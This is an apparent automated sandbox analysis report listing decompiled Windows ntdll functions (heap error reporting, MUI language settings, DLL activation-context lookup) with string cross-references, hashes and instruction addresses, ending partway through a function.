                                                          • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                          • Instruction ID: aa88dac9354ce80e58869fe81af384733d1b4aa777b4ce401d3a52c89c1b3f78
                                                          • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                          • Instruction Fuzzy Hash: 3BD0A7717903043BE610FEA59C03F2632CD9B45B00F494064F948D73C3D960F5004171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0347967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e9cccb9f0a99c0be1453ac4321923840df025e7806d46327c790f2463a485136
                                                          • Instruction ID: 993a03bc8e7389dc393450a6bb3b0ef2d7239746c5c1446855bfe5502d2ca036
                                                          • Opcode Fuzzy Hash: e9cccb9f0a99c0be1453ac4321923840df025e7806d46327c790f2463a485136
                                                          • Instruction Fuzzy Hash: 70B09B71D024C5C5D611E7604608F1B790477D1741F16C153D1020A55A4778C091F5B9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 034EB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 034EB314
                                                          • write to, xrefs: 034EB4A6
                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 034EB2F3
                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 034EB352
                                                          • The critical section is owned by thread %p., xrefs: 034EB3B9
                                                          • *** Inpage error in %ws:%s, xrefs: 034EB418
                                                          • read from, xrefs: 034EB4AD, 034EB4B2
                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 034EB323
                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 034EB305
                                                          • Go determine why that thread has not released the critical section., xrefs: 034EB3C5
                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 034EB484
                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 034EB47D
                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 034EB39B
                                                          • <unknown>, xrefs: 034EB27E, 034EB2D1, 034EB350, 034EB399, 034EB417, 034EB48E
                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 034EB476
                                                          • The instruction at %p tried to %s , xrefs: 034EB4B6
                                                          • *** enter .exr %p for the exception record, xrefs: 034EB4F1
                                                          • an invalid address, %p, xrefs: 034EB4CF
                                                          • The resource is owned shared by %d threads, xrefs: 034EB37E
                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 034EB48F
                                                          • *** enter .cxr %p for the context, xrefs: 034EB50D
                                                          • a NULL pointer, xrefs: 034EB4E0
                                                          • This failed because of error %Ix., xrefs: 034EB446
                                                          • The resource is owned exclusively by thread %p, xrefs: 034EB374
                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 034EB38F
                                                          • *** then kb to get the faulting stack, xrefs: 034EB51C
                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 034EB3D6
                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 034EB53F
                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 034EB2DC
                                                          • The instruction at %p referenced memory at %p., xrefs: 034EB432
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                          • API String ID: 0-108210295
                                                          • Opcode ID: 57d36a16b05e043efe9cbe4ab598ad87d0489784750d34054b827c23036f155d
                                                          • Instruction ID: 22c4a10e8df8c56820b8d539f7e0890265bec9d24c58b6274d4a24397ca72c67
                                                          • Opcode Fuzzy Hash: 57d36a16b05e043efe9cbe4ab598ad87d0489784750d34054b827c23036f155d
                                                          • Instruction Fuzzy Hash: CF81F43AA15220FFDB21EB069C49D7F3E25EF47652F95408BF4242F212D2619482C6AE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034F1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 44%
                                                          			E034F1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x34148a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0343B150();
				} else {
					E0343B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x352589c);
				E0343B150("Heap error detected at %p (heap handle %p)\n",  *0x35258a0);
				_t27 =  *0x3525898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M034F1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0343B150();
				} else {
					E0343B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0343B150("Error code: %d - %s\n",  *0x3525898);
				_t113 =  *0x35258a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0343B150();
					} else {
						E0343B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0343B150("Parameter1: %p\n",  *0x35258a4);
				}
				_t115 =  *0x35258a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0343B150();
					} else {
						E0343B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0343B150("Parameter2: %p\n",  *0x35258a8);
				}
				_t117 =  *0x35258ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0343B150();
					} else {
						E0343B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0343B150("Parameter3: %p\n",  *0x35258ac);
				}
				_t119 =  *0x35258b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0343B150();
					} else {
						E0343B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x35258b4);
					E0343B150("Last known valid blocks: before - %p, after - %p\n",  *0x35258b0);
				} else {
					_t120 =  *0x35258b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0343B150();
				} else {
					E0343B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0343B150("Stack trace available at %p\n", 0x35258c0);
			}











                                                          0x034f1c10
                                                          0x034f1c16
                                                          0x034f1c1e
                                                          0x034f1c3d
                                                          0x034f1c3e
                                                          0x034f1c20
                                                          0x034f1c35
                                                          0x034f1c3a
                                                          0x034f1c44
                                                          0x034f1c55
                                                          0x034f1c5a
                                                          0x034f1c65
                                                          0x034f1c67
                                                          0x00000000
                                                          0x034f1c6e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x034f1c67
                                                          0x034f1cdc
                                                          0x034f1ce5
                                                          0x034f1d04
                                                          0x034f1d05
                                                          0x034f1ce7
                                                          0x034f1cfc
                                                          0x034f1d01
                                                          0x034f1d0b
                                                          0x034f1d17
                                                          0x034f1d1f
                                                          0x034f1d25
                                                          0x034f1d30
                                                          0x034f1d4f
                                                          0x034f1d50
                                                          0x034f1d32
                                                          0x034f1d47
                                                          0x034f1d4c
                                                          0x034f1d61
                                                          0x034f1d67
                                                          0x034f1d68
                                                          0x034f1d6e
                                                          0x034f1d79
                                                          0x034f1d98
                                                          0x034f1d99
                                                          0x034f1d7b
                                                          0x034f1d90
                                                          0x034f1d95
                                                          0x034f1daa
                                                          0x034f1db0
                                                          0x034f1db1
                                                          0x034f1db7
                                                          0x034f1dc2
                                                          0x034f1de1
                                                          0x034f1de2
                                                          0x034f1dc4
                                                          0x034f1dd9
                                                          0x034f1dde
                                                          0x034f1df3
                                                          0x034f1df9
                                                          0x034f1dfa
                                                          0x034f1e00
                                                          0x034f1e0a
                                                          0x034f1e13
                                                          0x034f1e32
                                                          0x034f1e33
                                                          0x034f1e15
                                                          0x034f1e2a
                                                          0x034f1e2f
                                                          0x034f1e39
                                                          0x034f1e4a
                                                          0x034f1e02
                                                          0x034f1e02
                                                          0x034f1e08
                                                          0x00000000
                                                          0x00000000
                                                          0x034f1e08
                                                          0x034f1e5b
                                                          0x034f1e7a
                                                          0x034f1e7b
                                                          0x034f1e5d
                                                          0x034f1e72
                                                          0x034f1e77
                                                          0x034f1e95

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                          • API String ID: 0-2897834094
                                                          • Opcode ID: 91db1f9b2b9caa511ee502ed42a87d2c41fd4e395b9a2145f3acc8b55cba8881
                                                          • Instruction ID: 3a1609e28642c1ec332c90d88502e5a2b14332e4af0acf6669943e42766bec18
                                                          • Opcode Fuzzy Hash: 91db1f9b2b9caa511ee502ed42a87d2c41fd4e395b9a2145f3acc8b55cba8881
                                                          • Instruction Fuzzy Hash: 0C613437510294CFC611EB85D485E39B7A4EB0AA70B5D806FFA1A6F311D6749883DF0E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03443D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E03443D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E03441B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E03441B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E03441B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E03441B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E03441B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L03454620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0347F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E03481370(_t276, 0x3414e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0347BB40(0,  &_v68, _t170);
									if(L034443C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0347BB40(_t257,  &_v68, _t243);
								if(L034443C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E03481370(_t278, 0x3414e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L03454620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0347F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E03481370(_v16, 0x3414e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0347BB40(_t262,  &_v68, _t244);
								if(L034443C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E03481370(_t282, 0x3414e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0347BB40(_t262,  &_v68, _t201);
							if(L034443C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L03454620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0347F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E03481370(_t280, 0x3414e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0347BB40(_t267,  &_v68, _t245);
							if(L034443C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E03481370(_t284, 0x3414e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0347BB40(_t267,  &_v68, _t224);
						if(L034443C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                          0x03443d3c
                                                          0x03443d42
                                                          0x03443d44
                                                          0x03443d46
                                                          0x03443d49
                                                          0x03443d4c
                                                          0x03443d4f
                                                          0x03443d52
                                                          0x03443d55
                                                          0x03443d58
                                                          0x03443d5b
                                                          0x03443d5f
                                                          0x03443d61
                                                          0x03443d66
                                                          0x03498213
                                                          0x03498218
                                                          0x03444085
                                                          0x03444088
                                                          0x0344408e
                                                          0x03444094
                                                          0x0344409a
                                                          0x034440a0
                                                          0x034440a6
                                                          0x034440a9
                                                          0x034440af
                                                          0x034440b6
                                                          0x034440bd
                                                          0x034440bd
                                                          0x03443d83
                                                          0x0349821f
                                                          0x03498229
                                                          0x03498238
                                                          0x03498238
                                                          0x0349823d
                                                          0x0349823d
                                                          0x03443da0
                                                          0x03443daf
                                                          0x03443db5
                                                          0x03443dba
                                                          0x03443dba
                                                          0x03443dd4
                                                          0x03443e94
                                                          0x03443eab
                                                          0x03443f6d
                                                          0x03443f84
                                                          0x0344406b
                                                          0x0344406b
                                                          0x0344406e
                                                          0x0344406e
                                                          0x03444070
                                                          0x03444074
                                                          0x03498351
                                                          0x03498351
                                                          0x0344407a
                                                          0x0344407f
                                                          0x0349835d
                                                          0x03498370
                                                          0x03498377
                                                          0x03498379
                                                          0x0349837c
                                                          0x0349837c
                                                          0x0349835d
                                                          0x00000000
                                                          0x0344407f
                                                          0x03443f8a
                                                          0x03443f8d
                                                          0x03443f90
                                                          0x03443f95
                                                          0x0349830d
                                                          0x0349830f
                                                          0x03443f9b
                                                          0x03443fac
                                                          0x03443fae
                                                          0x03443fb1
                                                          0x03443fb1
                                                          0x03443fb6
                                                          0x03498317
                                                          0x0349831a
                                                          0x00000000
                                                          0x03443fbc
                                                          0x03443fc1
                                                          0x03443fc9
                                                          0x03443fd7
                                                          0x03443fda
                                                          0x03443fdd
                                                          0x03444021
                                                          0x03444021
                                                          0x03444029
                                                          0x03444030
                                                          0x03444044
                                                          0x03444046
                                                          0x03444046
                                                          0x03444044
                                                          0x03444049
                                                          0x03498327
                                                          0x03498334
                                                          0x03498339
                                                          0x0349833c
                                                          0x0344404f
                                                          0x0344404f
                                                          0x0344404f
                                                          0x03444051
                                                          0x03444056
                                                          0x03444063
                                                          0x03444063
                                                          0x03444068
                                                          0x00000000
                                                          0x03444068
                                                          0x03443fdf
                                                          0x03443fe2
                                                          0x03443fe4
                                                          0x03443fe7
                                                          0x03443fef
                                                          0x03444003
                                                          0x03444005
                                                          0x03444005
                                                          0x0344400c
                                                          0x03444013
                                                          0x03444016
                                                          0x03444017
                                                          0x0344401b
                                                          0x0344401e
                                                          0x00000000
                                                          0x0344401e
                                                          0x03443fb6
                                                          0x03443eb1
                                                          0x03443eb4
                                                          0x03443eb7
                                                          0x03443ebc
                                                          0x034982a9
                                                          0x034982ab
                                                          0x03443ec2
                                                          0x03443ed3
                                                          0x03443ed5
                                                          0x03443ed8
                                                          0x03443ed8
                                                          0x03443edd
                                                          0x034982b3
                                                          0x034982b6
                                                          0x00000000
                                                          0x03443ee3
                                                          0x03443ee8
                                                          0x03443eed
                                                          0x03443ef0
                                                          0x03443ef3
                                                          0x03443f02
                                                          0x03443f05
                                                          0x03443f08
                                                          0x034982c0
                                                          0x034982c3
                                                          0x034982c5
                                                          0x034982c8
                                                          0x034982d0
                                                          0x034982e4
                                                          0x034982e6
                                                          0x034982e6
                                                          0x034982ed
                                                          0x034982f4
                                                          0x034982f7
                                                          0x034982f8
                                                          0x034982fc
                                                          0x034982ff
                                                          0x034982ff
                                                          0x03443f0e
                                                          0x03443f11
                                                          0x03443f16
                                                          0x03443f1d
                                                          0x03443f31
                                                          0x03498307
                                                          0x03498307
                                                          0x03443f31
                                                          0x03443f39
                                                          0x03443f48
                                                          0x03443f4d
                                                          0x03443f50
                                                          0x03443f50
                                                          0x03443f53
                                                          0x03443f58
                                                          0x03443f65
                                                          0x03443f65
                                                          0x03443f6a
                                                          0x00000000
                                                          0x03443f6a
                                                          0x03443edd
                                                          0x03443dda
                                                          0x03443ddd
                                                          0x03443de0
                                                          0x03443de5
                                                          0x03498245
                                                          0x03443deb
                                                          0x03443df7
                                                          0x03443dfc
                                                          0x03443dfe
                                                          0x03443e01
                                                          0x03443e01
                                                          0x03443e06
                                                          0x0349824d
                                                          0x0349824f
                                                          0x03498254
                                                          0x00000000
                                                          0x03443e0c
                                                          0x03443e11
                                                          0x03443e16
                                                          0x03443e19
                                                          0x03443e29
                                                          0x03443e2c
                                                          0x03443e2f
                                                          0x0349825c
                                                          0x0349825f
                                                          0x03498261
                                                          0x03498264
                                                          0x0349826c
                                                          0x03498280
                                                          0x03498282
                                                          0x03498282
                                                          0x03498289
                                                          0x03498290
                                                          0x03498293
                                                          0x03498294
                                                          0x03498298
                                                          0x0349829b
                                                          0x0349829b
                                                          0x03443e35
                                                          0x03443e38
                                                          0x03443e3d
                                                          0x03443e44
                                                          0x03443e58
                                                          0x034982a3
                                                          0x034982a3
                                                          0x03443e58
                                                          0x03443e60
                                                          0x03443e6f
                                                          0x03443e74
                                                          0x03443e77
                                                          0x03443e77
                                                          0x03443e7a
                                                          0x03443e7f
                                                          0x03443e8c
                                                          0x03443e8c
                                                          0x03443e91
                                                          0x00000000
                                                          0x03443e91

                                                          Strings
                                                          • Kernel-MUI-Number-Allowed, xrefs: 03443D8C
                                                          • Kernel-MUI-Language-Allowed, xrefs: 03443DC0
                                                          • Kernel-MUI-Language-Disallowed, xrefs: 03443E97
                                                          • Kernel-MUI-Language-SKU, xrefs: 03443F70
                                                          • WindowsExcludedProcs, xrefs: 03443D6F
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                          • API String ID: 0-258546922
                                                          • Opcode ID: eb629a2dab0244aec993a22b9f9420ff00e9b38a754a5db1855f108ae78d0086
                                                          • Instruction ID: af7344808122ca786a9e979de676b1510cca24a7aad8a00e56b4538bc170d465
                                                          • Opcode Fuzzy Hash: eb629a2dab0244aec993a22b9f9420ff00e9b38a754a5db1855f108ae78d0086
                                                          • Instruction Fuzzy Hash: C6F12B76D00618EFDB11DF99C980AEEBBB9EF08650F14006BE905AF351E7349A01CB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03468E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 44%
                                                          			E03468E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x352d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x3528464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x3525780 & 0x00000003) != 0) {
							E034B5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x3525780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0347B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x3527984; // 0x2fd1df0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
